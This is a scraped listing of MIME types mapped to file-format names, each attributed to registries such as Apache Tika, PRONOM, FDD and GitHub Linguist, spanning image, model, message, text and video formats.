Portable Graymap Graphic tika
—  image/x-portable-pixmapNetpbm formats ffw
UNIX Portable Bitmap Graphic tika
Portable Pixel Map – ASCII pronom
image/x-portable-arbitrarymapPortable Arbitrary Map ffw
image/x-psdPhotoshop Image tika
image/x-quicktimeQuickTime File Format fdd
image/x-raw-adobeAdobe Digital Negative tika
image/x-raw-canonCanon raw image tika
image/x-raw-casioCasio raw image tika
image/x-raw-epsonEpson raw image tika
image/x-raw-fujiFuji raw image tika
image/x-raw-hasselbladHasselblad raw image tika
image/x-raw-imaconImacon raw image tika
image/x-raw-kodakKodak raw image tika
image/x-raw-leafLeaf raw image tika
image/x-raw-logitechLogitech raw image tika
image/x-raw-mamiyaMamiya raw image tika
image/x-raw-minoltaMinolta raw image tika
image/x-raw-nikonNikon raw image tika
image/x-raw-olympusOlympus raw image tika
image/x-raw-panasonicPanasonic raw image tika
image/x-raw-pentaxPentax raw image tika
image/x-raw-phaseonePhase One raw image tika
image/x-raw-rawzorRawzor raw image tika
image/x-raw-redRed raw image tika
image/x-raw-sigmaSigma raw image tika
image/x-raw-sonySony raw image tika
image/x-rgbSilicon Graphics RGB Bitmap tika
image/x-sgi-bwSilicon Graphics Image pronom
image/x-sldAutoCAD Slide pronom
image/x-sun-rasterSun Raster Image pronom
image/x-tifTIFF, Revision 6.0 fdd
image/x-tiffTIFF, Revision 6.0 fdd
image/x-win-bitmapMicrosoft Windows Cursor pronom
image/x-wmfWindows Metafile tika
image/x-xcfGIMP Image File tika
image/x-xpixmapimage/x-xpixmap tika
—  image/x-xpixmap; version=”x10″X-Windows Pixmap Image X10 pronom
image/x-xwindowdumpX Windows Dump tika
—  image/x-xwindowdump; version=”x10″X-Windows Screen Dump File X10 pronom
image/xcfGIMP Image File tika
interface/x-winamp-skinWinamp Skin ffw
message/cpimmessage/cpim tika
CPIM Instant Message Format fdd
message/delivery-statusmessage/delivery-status tika
message/disposition-notificationmessage/disposition-notification tika
message/examplemessage/example tika
message/external-bodymessage/external-body tika
message/globalmessage/global tika
message/global-delivery-statusmessage/global-delivery-status tika
message/global-disposition-notificationmessage/global-disposition-notification tika
message/global-headersmessage/global-headers tika
message/httpmessage/http tika
HTTP githublinguist
message/imdn+xmlmessage/imdn+xml tika
message/partialmessage/partial tika
message/s-httpmessage/s-http tika
message/sipmessage/sip tika
message/sipfragmessage/sipfrag tika
message/tracking-statusmessage/tracking-status tika
message/ tika
model/examplemodel/example tika
model/gltf+jsonglTF (GL Transmission Format) 2.0 fdd
glTF (GL Transmission Format) Family fdd
model/gltf-binaryglTF (GL Transmission Format) 2.0 fdd
glTF (GL Transmission Format) Family fdd
model/igesIGES ffw
Initial Graphics Exchange Specification Format tika
—  model/iges; version=”5.x”Initial Graphics Exchange Specification (IGES) 5.x pronom
model/meshmodel/mesh tika
model/mtlWavefront Material Template Library (MTL) File Format fdd
model/objWavefront OBJ File Format fdd
model/prcProduct Representation Compact (PRC) File Format fdd
model/stlSTL (STereoLithography) File Format, Binary fdd
STL (STereoLithography) File Format Family fdd
STL (STereoLithography) File Format, ASCII fdd
model/u3dUniversal 3D (U3D) format family. ECMA-363, Editions 1-4 fdd
model/vnd-dwfDWF ffw
model/vnd.adobe.dn+dcxucfAdobe Dimension ffw
model/vnd.collada+xmlCOLLADA ffw
model/vnd.dwfmodel/vnd.dwf tika
model/vnd.flatland.3dmlmodel/vnd.flatland.3dml tika
model/vnd.gdlmodel/vnd.gdl tika
model/ tika
model/ tika
model/vnd.gtwmodel/vnd.gtw tika
model/vnd.moml+xmlmodel/vnd.moml+xml tika
model/vnd.mtsmodel/vnd.mts tika
model/vnd.parasolid.transmit.binarymodel/vnd.parasolid.transmit.binary tika
model/vnd.parasolid.transmit.textmodel/vnd.parasolid.transmit.text tika
model/vnd.usdz+zipUSDZ ffw
model/vnd.valve.source.compiled-mapBSP ffw
model/vnd.vtumodel/vnd.vtu tika
model/vrmlVRML ffw
model/vrml tika
—  model/vrml; version=”1.0″Virtual Reality Modeling Language 1.0 pronom
—  model/vrml; version=”2.0″Virtual Reality Modeling Language 2.0 pronom
model/x3d+binaryX3D ffw
model/x3d+fastinfosetExtensible 3D (X3D) File Format Family fdd
model/x3d+vrmlX3D ffw
model/x3d+xmlX3D ffw
Extensible 3D (X3D) File Format Family fdd
model/x3d-vrmlExtensible 3D (X3D) File Format Family fdd
multipart/alternativemultipart/alternative tika
multipart/appledoubleAppleDouble ffw
multipart/appledouble tika
—  multipart/appledouble; version=”1″AppleDouble Resource Fork 1 pronom
—  multipart/appledouble; version=”2″AppleDouble Resource Fork 2 pronom
multipart/byterangesmultipart/byteranges tika
multipart/digestmultipart/digest tika
multipart/encryptedmultipart/encrypted tika
multipart/examplemultipart/example tika
multipart/form-dataMultipart/Form-Data ffw
multipart/form-data tika
multipart/header-setmultipart/header-set tika
multipart/mixedmultipart/mixed tika
multipart/parallelmultipart/parallel tika
multipart/relatedmultipart/related tika
Microsoft Web Archive pronom
multipart/reportmultipart/report tika
multipart/signedmultipart/signed tika
multipart/voice-messagemultipart/voice-message tika
multipart/x-tarTape Archive (tar) File Format Family fdd
text/aplAPL githublinguist
text/calendarICalendar ffw
text/calendar tika
Internet Calendar and Scheduling format pronom
iCalendar Electronic Calendar and Scheduling Format fdd
text/comma-separated-valuesCSV ffw
text/csv-schemaCSV Schema pronom
text/directorytext/directory tika
text/dnsZone file ffw
text/dns tika
text/ecmascripttext/ecmascript tika
text/enrichedtext/enriched tika
text/exampletext/example tika
text/geminiGemini ffw
text/htmlHTML ffw
HyperText Markup Language tika
Java Servlet Page pronom
PHP Script Page pronom
Hypertext Markup Language pronom
HyperText Markup Language (HTML) Format Family fdd
HyperText Markup Language (HTML) 5 fdd
Extensible HyperText Markup Language (XHTML), 1.0 fdd
HTML+Razor githublinguist
HTML githublinguist
HTML+ECR githublinguist
Kit githublinguist
Marko githublinguist
HTML+EEX githublinguist
MTML githublinguist
StringTemplate githublinguist
Svelte githublinguist
—  text/html; version=”2.0″Hypertext Markup Language 2.0 pronom
—  text/html; version=”3.2″Hypertext Markup Language 3.2 pronom
—  text/html; version=”4.0″Hypertext Markup Language 4.0 pronom
—  text/html; version=”4.01″Hypertext Markup Language 4.01 pronom
—  text/html; version=”5″Hypertext Markup Language 5 pronom
text/jsonJSON (JavaScript Object Notation) fdd
text/jsxTSX githublinguist
text/markdownMarkdown ffw
CommonMark ffw
text/mircIRC log githublinguist
text/n3Notation3 pronom
text/parityfectext/parityfec tika
text/pdfPDF (Portable Document Format) Family fdd
text/plainPlain text ffw
ASCII Art ffw
Freenet node reference ffw
Xbill.scores ffw
Atomix.scores ffw
Atc score ffw
Axc ffw
ALC ffw
ALD ffw
ALI ffw
ALT ffw
AOI ffw
ADD ffw
ADI ffw
text/plain tika
Macintosh Text File pronom
MS-DOS Text File pronom
Unicode Text File pronom
7-bit ANSI Text pronom
7-bit ASCII Text pronom
Fixed Width Values Text File pronom
Plain Text File pronom
MS-DOS Text File with line breaks pronom
8-bit ANSI Text pronom
8-bit ASCII Text pronom
Steel Detailing Neutral Format pronom
Microsoft Internet Shortcut pronom
ESRI World File fdd
—  application/infINF (Windows) ffw
Windows setup INFormation tika
Windows Setup File pronom
—  application/javascriptJavaScript ffw
JavaScript Source Code tika
JavaScript file pronom
ECMAScript Language (ECMA-262), including JavaScript fdd
JavaScript+ERB githublinguist
— —  application/jsonJSON ffw
application/json tika
JSON Data Interchange Format pronom
JSON (JavaScript Object Notation) fdd
GeoJSON, Version 1.0 (2008) fdd
JSON5 githublinguist
JSONLD githublinguist
Jupyter Notebook githublinguist
Ecere Projects githublinguist
JSONiq githublinguist
JSON githublinguist
Max githublinguist
—  application/mboxMbox ffw
application/mbox tika
MBOX pronom
MBOX Email Format fdd
—  application/relax-ng-compact-syntaxapplication/relax-ng-compact-syntax tika
—  application/rtfRTF ffw
Rich Text Format File tika
Rich Text Format (RTF) Family fdd
— —  application/rtf; version=”0″Rich Text Format 0 pronom
— —  application/rtf; version=”1.0-1.4″Rich Text Format 1.0-1.4 pronom
— —  application/rtf; version=”1.5-1.6″Rich Text Format 1.5-1.6 pronom
— —  application/rtf; version=”1.7″Rich Text Format 1.7 pronom
— —  application/rtf; version=”1.8″Rich Text Format 1.8 pronom
— —  application/rtf; version=”1.9″Rich Text Format 1.9 pronom
— —  text/rtf; version=”1.0-1.4″Rich Text Format 1.0-1.4 pronom
— —  text/rtf; version=”1.5-1.6″Rich Text Format 1.5-1.6 pronom
— —  text/rtf; version=”1.7″Rich Text Format 1.7 pronom
— —  text/rtf; version=”1.8″Rich Text Format 1.8 pronom
— —  text/rtf; version=”1.9″Rich Text Format 1.9 pronom
—  application/x-bibtex-text-fileapplication/x-bibtex-text-file tika
—  application/x-httpd-jspJava Server Page tika
—  application/x-javascriptJavaScript Source Code tika
—  application/x-projectapplication/x-project tika
— —  application/x-project; version=”1.0″Microsoft Project Export File 1.0 pronom
— —  application/x-project; version=”3.0″Microsoft Project Export File 3.0 pronom
— —  application/x-project; version=”4.0″Microsoft Project Export File 4.0 pronom
—  application/x-sasSAS Program tika
—  application/x-setupscriptWindows setup INFormation tika
—  application/x-shUNIX/LINUX Shell Script tika
Shell Archive Format pronom
—  application/x-tclTcl script tika
—  application/x-texTeX ffw
TeX Source tika
— —  application/x-latexLaTeX Source Document tika
—  application/x-wine-extension-infWindows setup INFormation tika
—  application/x-xmlExtensible Markup Language tika
—  application/xmlXML ffw
XML Schema Definition ffw
Extensible Markup Language tika
XML Schema Definition pronom
Extensible Stylesheet Language pronom
XML (Extensible Markup Language) fdd
ONIX for Books fdd
Ant Build System githublinguist
— —  application/dif+xmlapplication/dif+xml tika
— —  application/dita+xmlDarwin Information Typing Architecture tika
— — —  application/dita+xml;format=mapDITA Map tika
— — —  application/dita+xml;format=taskDITA Task Topic tika
— — —  application/dita+xml;format=topicDITA Topic tika
— — — —  application/dita+xml;format=conceptDITA Concept Topic tika
— — —  application/dita+xml;format=valDITA Conditional Processing Profile tika
— —  application/rdf+xmlRDF ffw
XML syntax for RDF graphs tika
RDF/XML pronom
— —  application/ ffw
Keyhole Markup Language tika
KML, Version 2.2 fdd
— —  application/x-adobe-indesign-interchangeAdobe InDesign Interchange format tika
— —  application/x-fictionbook+xmlFictionBook document tika
— —  application/xml; version=”1.0″Extensible Markup Language 1.0 pronom
— —  image/svg+xmlScalable Vector Graphics ffw
Scalable Vector Graphics tika
Scalable Vector Graphics Compressed pronom
Scalable Vector Graphics (SVG) File Format Family fdd
Scalable Vector Graphics (SVG), Version 1.1 fdd
Scalable Vector Graphics (SVG), Version 2 fdd
Scalable Vector Graphics (SVG) Tiny, Version 1.2 fdd
— — —  image/svg+xml; version=”1.0″Scalable Vector Graphics 1.0 pronom
— — —  image/svg+xml; version=”1.1″Scalable Vector Graphics 1.1 pronom
— —  image/vnd.adobe.premiereimage/vnd.adobe.premiere tika
— —  text/iso19139+xmltext/iso19139+xml tika
—  application/xml-dtdDTD ffw
XML Document Type Definition tika
XML Document Type Definition (DTD) fdd
—  application/xqueryXQuery source code tika
XQuery githublinguist
—  text/aspActive Server Page tika
—  text/aspdotnetASP .NET tika
—  text/cssCascading Style Sheets ffw
Cascading Style Sheet tika
Cascading Style Sheet pronom
Cascading Style Sheet (CSS) File Format fdd
Cloud Firestore Security Rules githublinguist
Less githublinguist
CSS githublinguist
—  text/csvCSV ffw
text/csv tika
Comma Separated Values pronom
CSV, Comma Separated Values (RFC 4180) fdd
—  text/javascriptJavaScript ffw
JavaScript Source Code tika
JSON (JavaScript Object Notation) fdd
JSON with Comments githublinguist
JavaScript githublinguist
Qt Script githublinguist
Cycript githublinguist
PEG.js githublinguist
—  text/propertiesJava Properties tika
—  text/rtfRTF ffw
Rich Text Format File tika
Rich Text Format (RTF) Family fdd
—  text/vttWebVTT ffw
Web Video Text Tracks Format tika
—  text/x-actionscriptActionScript source code tika
—  text/x-adaAda source code tika
—  text/x-applescriptAppleScript source code tika
—  text/x-asciidocAsciidoc source code tika
—  text/x-asmAssembler source code tika
—  text/x-aspectjAspectJ source code tika
—  text/x-assemblyAssembler source code tika
—  text/x-awkAWK script tika
—  text/x-basicBasic source code tika
— —  text/x-vbasicVisual basic source code tika
— — —  text/x-vbdotnetVB.NET source code tika
— — —  text/x-vbscriptVBScript source code tika
—  text/x-cC source code tika
— —  image/x-xbitmapXBM ffw
image/x-xbitmap tika
— — —  image/x-xbitmap; version=”x10″X-Windows Bitmap Image X10 pronom
— — —  image/x-xbitmap; version=”x11″X-Windows Bitmap Image X11 pronom
—  text/x-c++hdrC++ source code header tika
—  text/x-c++srcC++ source code tika
AngelScript githublinguist
Cuda githublinguist
Metal githublinguist
C++ githublinguist
Squirrel githublinguist
SWIG githublinguist
Edje Data Collection githublinguist
Game Maker Language githublinguist
AGS Script githublinguist
—  text/x-cgiCGI script tika
—  text/x-chdrC source code header tika
—  text/x-clojureClojure source code tika
edn githublinguist
Rouge githublinguist
Clojure githublinguist
wisp githublinguist
—  text/x-cobolCOBOL source code tika
COBOL githublinguist
—  text/x-coffeescriptCoffeeScript source code tika
CSON githublinguist
CoffeeScript githublinguist
EmberScript githublinguist
—  text/x-coldfusionColdFusion source code tika
—  text/x-common-lispCommon Lisp source code tika
NewLisp githublinguist
LFE githublinguist
Emacs Lisp githublinguist
WebAssembly githublinguist
GCC Machine Description githublinguist
SRecode Template githublinguist
KiCad Layout githublinguist
NetLogo githublinguist
Common Lisp githublinguist
—  text/x-csharpC# source code tika
EQ githublinguist
Uno githublinguist
C# githublinguist
Beef githublinguist
—  text/x-csrcC source code tika
DTrace githublinguist
X PixMap githublinguist
NWScript githublinguist
OpenCL githublinguist
XC githublinguist
XS githublinguist
Unified Parallel C githublinguist
HolyC githublinguist
C githublinguist
X BitMap githublinguist
—  text/x-dD source code tika
Volt githublinguist
D githublinguist
—  text/x-difftext/x-diff tika
Diff githublinguist
—  text/x-dtdXML Document Type Definition tika
—  text/x-eiffelEiffel source code tika
Eiffel githublinguist
—  text/x-emacs-lispEmacs Lisp source code tika
—  text/x-erlangErlang source code tika
Erlang githublinguist
—  text/x-expectExpect Script tika
—  text/x-forthForth source code tika
MUF githublinguist
Forth githublinguist
—  text/x-fortranFortran source code tika
Fortran githublinguist
Fortran Free Form githublinguist
—  text/x-goGo source code tika
Go githublinguist
V githublinguist
—  text/x-groovyGroovy source code tika
Groovy githublinguist
—  text/x-hamlHAML source code tika
Haml githublinguist
—  text/x-haskellHaskell source code tika
Haskell githublinguist
Grammatical Framework githublinguist
Cabal Config githublinguist
C2hs Haskell githublinguist
PureScript githublinguist
Dhall githublinguist
—  text/x-haxeHaxe source code tika
Haxe githublinguist
—  text/x-idlInteface Definition Language tika
IDL githublinguist
—  text/x-iniConfiguration file tika
—  text/x-javaJava source code tika
ChucK githublinguist
UnrealScript githublinguist
Java githublinguist
Apex githublinguist
—  text/x-java-propertiesJava Properties tika
—  text/x-java-sourceJava source code tika
—  text/x-jspJava Server Page tika
—  text/x-lessLESS source code tika
—  text/x-lexLex/Flex source code tika
—  text/x-logapplication log tika
—  text/x-luaLua source code tika
Lua githublinguist
Terra githublinguist
—  text/x-matlabMatlab source code tika
—  text/x-mlML source code tika
—  text/x-modulaModula source code tika
—  text/x-objcsrcObjective-C ffw
Objective-C source code tika
—  text/x-ocamlOcaml source code tika
OCaml githublinguist
Standard ML githublinguist
—  text/x-pascalPascal source code tika
Component Pascal githublinguist
Pascal githublinguist
—  text/x-perlPerl script tika
Perl githublinguist
Raku githublinguist
Pod githublinguist
—  text/x-phpPHP script tika
—  text/x-prologProlog source code tika
—  text/x-propertiesJava Properties tika
EditorConfig githublinguist
INI githublinguist
Record Jar githublinguist
Windows Registry Entries githublinguist
Java Properties githublinguist
Git Config githublinguist
TextMate Properties githublinguist
—  text/x-pythonPython script tika
GN githublinguist
Easybuild githublinguist
Sage githublinguist
Xonsh githublinguist
NumPy githublinguist
Starlark githublinguist
Python githublinguist
—  text/x-rexxRexx source code tika
—  text/x-rsrcR ffw
R source code tika
R githublinguist
—  text/x-rstreStructuredText source code tika
reStructuredText githublinguist
—  text/x-rubyRuby source code tika
HCL githublinguist
Mirah githublinguist
Ruby githublinguist
—  text/x-scalaScala source code tika
Scala githublinguist
—  text/x-schemeScheme source code tika
Scheme githublinguist
Nu githublinguist
—  text/x-sedSed code tika
—  text/x-setexttext/x-setext tika
—  text/x-sqlSQL code tika
PLpgSQL githublinguist
SQLPL githublinguist
SQL githublinguist
—  text/x-stsrcSmalltalk source code tika
Smalltalk githublinguist
—  text/x-tclTcl script tika
Tcl githublinguist
Glyph githublinguist
—  text/x-texTeX Source tika
—  text/x-vcalendartext/x-vcalendar tika
VCalendar format pronom
—  text/x-vcardtext/x-vcard tika
—  text/x-verilogVerilog source code tika
Verilog githublinguist
—  text/x-vhdlVHDL source code tika
VHDL githublinguist
—  text/x-web-markdownMarkdown source code tika
—  text/x-yaccYacc/Bison source code tika
—  text/x-yamlYAML source code tika
RAML githublinguist
LookML githublinguist
Common Workflow Language githublinguist
YAML githublinguist
Unity3D Asset githublinguist
Kaitai Struct githublinguist
SaltStack githublinguist
—  text/xmlXML ffw
XML Schema Definition ffw
Skype shared configuration ffw
Extensible Markup Language tika
DTB (Digital Talking Book), 2005 fdd
XML (Extensible Markup Language) fdd
ESRI Geodatabase XML fdd
Geography Markup Language (GML) fdd
ONIX for Books fdd
XPages githublinguist
COLLADA githublinguist
Eagle githublinguist
Maven POM githublinguist
XML githublinguist
XSLT githublinguist
LabVIEW githublinguist
XProc githublinguist
SVG githublinguist
Genshi githublinguist
XML Property List githublinguist
— —  text/xml; version=”1.0″Extensible Markup Language 1.0 pronom
DROID Signature File Format 1.0 pronom
DROID File Collection File Format 1.0 pronom
text/prs.fallenstein.rsttext/prs.fallenstein.rst tika
text/prs.lines.tagtext/prs.lines.tag tika
text/redtext/red tika
text/rfc822-headerstext/rfc822-headers tika
text/richtexttext/richtext tika
text/rssapplication/rss+xml tika
text/rtp-enc-aescm128text/rtp-enc-aescm128 tika
text/rtxtext/rtx tika
text/sgmlSGML ffw
text/sgml tika
Standard Generalized Markup Language pronom
Standard Generalized Markup Language (SGML). ISO 8879:1986 fdd
text/t140text/t140 tika
text/tab-separated-valuesTab delimited ffw
text/tab-separated-values tika
Tab-separated values pronom
TSV, Tab-Separated Values fdd
text/troffRoff/nroff/troff/groff Unformatted Manual Page (UNIX) tika
Roff Manpage githublinguist
Roff githublinguist
Pic githublinguist
text/turtleTurtle pronom
Turtle githublinguist
text/ulpfectext/ulpfec tika
text/uri-listtext/uri-list tika
text/urlInternet Shortcut ffw
text/vbscriptVBScript githublinguist
text/vcardVCard ffw
vCard pronom
text/vnd.abctext/ tika
text/vnd.ascii-artASCII Art ffw
text/vnd.curltext/vnd.curl tika
text/vnd.curl.dcurltext/vnd.curl.dcurl tika
text/vnd.curl.mcurltext/vnd.curl.mcurl tika
text/vnd.curl.scurltext/vnd.curl.scurl tika
text/vnd.dmclientscripttext/vnd.dmclientscript tika
text/vnd.esmertec.theme-descriptortext/vnd.esmertec.theme-descriptor tika
text/vnd.flytext/ tika
text/vnd.fmi.flexstortext/vnd.fmi.flexstor tika
text/vnd.graphviztext/vnd.graphviz tika
text/vnd.in3d.3dmltext/vnd.in3d.3dml tika
text/vnd.in3d.spottext/ tika
text/vnd.iptc.anpaAmerican Newspaper Publishers Association Wire Feeds tika
text/vnd.iptc.newsmltext/vnd.iptc.newsml tika
text/vnd.iptc.nitfNews Industry Text Format ffw
text/vnd.iptc.nitf tika
NITF, News Industry Text Format fdd
text/vnd.latex-ztext/vnd.latex-z tika
text/vnd.motorola.reflextext/vnd.motorola.reflex tika
text/ tika
text/vnd.net2phone.commcenter.commandtext/vnd.net2phone.commcenter.command tika
text/ tika
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Asymptote githublinguist
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Alpine Abuild githublinguist
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video/mp4 tika
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MPEG-4 File Format for Advanced Video Coding (Non-FRExt Extensions, Part 15) fdd
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MPEG-4 File Format, Version 1 fdd
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video/x-mng tika
Multiple-image Network Graphics pronom
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MPEG-2 Encoding Family fdd
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MPEG-2 Encoding Family fdd
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Windows Media Video pronom
WMV (Windows Media Video) File Format fdd
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ASF (Advanced Systems Format) fdd
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Audio Video Interleave File tika
Audio/Video Interleaved Format pronom
AVI (Audio Video Interleaved) File Format fdd
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video/x-sgi-movie tika
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x-conference/x-cooltalkCooltalk Audio tika
x-world/x-3dmf3DMF ffw

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